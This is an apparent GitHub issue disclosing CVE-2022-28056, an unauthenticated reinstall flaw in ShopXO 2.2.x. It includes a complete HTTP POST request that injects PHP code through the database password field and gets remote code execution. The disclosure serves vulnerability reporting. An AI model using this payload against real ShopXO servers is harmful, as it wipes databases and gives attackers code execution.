CVE-2022-28056: A system reinstall vulnerability was found in ShopXO · Issue #66 · gongfuxiang/shopxo

Hello, in my code audit process, I found system reinstallation vulnerability in ShopXO 2.2.0-2.2.5, the details are as follows:

In app/install/controller/Index.php file，Add function.

Do not have permission to check visitors, also didn’t check whether installed database (check the config/database.php exists

Then the add function resets the original database data and writes the data submitted in the POST to config/database.php, which can be injected into the code, resulting in RCE

Below is the attacked PayLoad

POST /install.php?s=index/Add.html HTTP/1.1
Host: xxxx
User-Agent: xxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
X-Requested-With: XMLHttpRequest
Referer: http://xxxx/admin.php?s=index/index.html
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

DB_TYPE=mysql&DB_HOST=192.168.195.185&DB_PORT=3306&DB_NAME=shopxo&DB_USER=root&DB_PWD=root'.phpinfo().'123&DB_PREFIX=sxo_&DB_CHARSET=utf8mb4

Then open any page to see the PHPInfo page